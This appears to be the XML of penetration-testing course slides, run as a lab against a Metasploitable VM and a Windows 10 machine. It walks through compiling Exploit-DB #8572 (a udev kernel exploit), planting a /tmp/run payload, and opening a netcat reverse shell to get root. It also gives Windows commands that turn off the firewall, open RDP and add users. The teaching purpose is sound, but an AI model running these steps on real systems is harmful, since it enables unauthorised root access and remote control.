      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="781946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6900D-F399-4217-8AC0-5FF16374D4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Metasploitable Kernel Exploit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06AD9-8241-4229-8D6B-7276E66841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/>
              <a:t>Try Exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> #8572</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Check it out:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>less /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>exploitdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/exploits/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>/local/8572.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4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25557C-6676-4BE5-909F-EAA495961E8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="3955818"/>
            <a:ext cx="2209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5B63ED3-932F-C74B-BC60-7C697B6D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60" y="2445258"/>
            <a:ext cx="7928480" cy="21009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272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6900D-F399-4217-8AC0-5FF16374D4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Metasploitable Kernel Exploit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06AD9-8241-4229-8D6B-7276E66841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4772757" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This exploit takes advantage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the device manager for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are usage instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will need the PID of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udevd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as an argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If it's successful, it will run whatever is in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transfer the source code to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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6A15E-B9DE-134D-B29D-0C23B8E1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93" y="1046692"/>
            <a:ext cx="3517220" cy="3705118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7371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5E88A-0D2F-48D7-B9B5-8E154F5931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Source Code Review</a:t>
            </a:r>
          </a:p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F73BB-030F-4C6C-A4A5-B29F00436F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/>
              <a:t>Walk through the main function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>It checks for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>, then executes establish(), update(), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>writebuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Finally, send(s, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>, targets[n].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> + 2, 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Payload generation in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>writebuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Default payload is a bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Our buffer length is 0x2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>8192 in decimal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>update() may have been used to update our port or host address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>The buffer it written in pieces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t> follows along to write in each location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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BF9C38-6B82-445C-89E2-8E4E921B7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1925206"/>
            <a:ext cx="4554764" cy="357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58AC77-596D-4F5D-9139-AD5641BB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05" y="2954215"/>
            <a:ext cx="3794734" cy="2046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091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B16CD-9813-402B-BFA6-2E7D21C6EB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Building and Setup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C9A0B-C38D-47F9-844A-DB62231C97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We will need to first build this exploit since all we have is a C file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>If it's possible, we are much less likely to have errors if building our source code on the target machine or a similar OS and version system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> has GCC so we'll copy our source code over and build it there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We also need to do some setup: Get the PID of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>udevd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>netlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> socket and also put something into /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/run as out payload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50DEE-92B3-4441-868C-623F6E47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17" y="1789145"/>
            <a:ext cx="3277924" cy="1071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371D2A-BE3D-1343-8A94-4D179BDB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17" y="3315091"/>
            <a:ext cx="3901977" cy="159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160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7F92F-792E-43C7-8C88-0F744265B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Create a payload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0C2C2C-63B1-4A1F-B6A4-840C60D2F1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This exploit will run whatever is in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It will run it in a different shell, one that we cannot see, and the shell will close immediately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is the kernel doing "clean up" tasks after a device is removed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to create another persistent reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>get root!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18F75-7F70-9C4E-8F9B-3B458DFD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053" y="2580377"/>
            <a:ext cx="6337900" cy="2218265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91620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Privilege Escalation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Windows 10 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="11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34208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DC602-5A1D-4F6D-8B4B-C7FF1A243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Plan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69AD1A-4A79-4E5A-802E-6181F92CE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In this part, we will follow a similar methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Get a limited shell on a Windows target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Enumerate the remote target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Patch level, version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use Window Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Suggester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> to help us research possible exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Identify a possible exploit to gain SYSTEM on the remote Windows target from Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>After we get SYSTEM, use MinGW to cross-compile a reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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63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Disable Firewall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Make sure we can ping all machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>From Windows 10.10.0.5, ping Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Open up an administrator Powershell window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ping should work. If not, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Double check network config in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Double check IP settings for both machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Keep admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> window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AE8BE-71CE-48B3-8DF4-0063FD72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97" y="838568"/>
            <a:ext cx="2299515" cy="4134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5352757" y="1528222"/>
            <a:ext cx="1618421" cy="406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7129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A13D9-78D3-4979-9C73-630CDEE692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Administrative Commands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D17783-1A0D-4418-87B1-0206D7A8F2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 fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will need to run a few more commands in the admin window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable Windows firewall (avoids troubleshooting connection issues)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>allprofiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> state off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable RDP and change settings to allow connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>\Control\Terminal Server" /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fDenyTSConnections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> /t REG_DWORD /d 0 /f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>\Control\Terminal Server\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>WinStations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>\RDP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>" /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>UserAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> /t REG_DWORD /d 0 /f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add a new user with limited privileges, and add them to the RDP group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>net user [username] [password] /add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>NET LOCALGROUP "Remote Desktop Users" [username] /ADD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lab, the example user is '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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556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C3277-82D9-4E3C-92DB-9AAE97BEBA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- Network to Private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6EBF5A-5E7E-4AD6-9712-5A54E82F6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step on old version of Windows: Set network to Private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get the index number and use it to set the Network Category</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>PS C:\Windows\system32&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>NetConnectionProfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Name             : Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>InterfaceAlias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>   : Ethernet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>InterfaceIndex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>   : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>NetworkCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>  : Public</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>IPv4Connectivity : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>LocalNetwork</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>IPv6Connectivity : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>NoTraffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>PS C:\Windows\system32&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>NetConnectionProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>InterfaceIndex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>NetworkCategory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> Private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many of these security disablements are to avoid connection troubleshooting issues in our lab. Real targets will not be as easy.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72F239-3615-45A9-A2B8-22CCA8E73644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2983832" y="2536944"/>
            <a:ext cx="3496748" cy="1189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443E708-87C4-C04E-8DCF-C2D160FE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05" y="2020196"/>
            <a:ext cx="3722246" cy="11031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5040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0051-B8BE-431E-B5C7-029C0C4AC2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Netcat to Reverse Shell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4F9968-A590-456B-A3D3-D63D0FD3C9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4093788" cy="395509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 dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>rdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>, start a new RDP session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>rdesktop -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>[username]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -p - 10.10.0.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
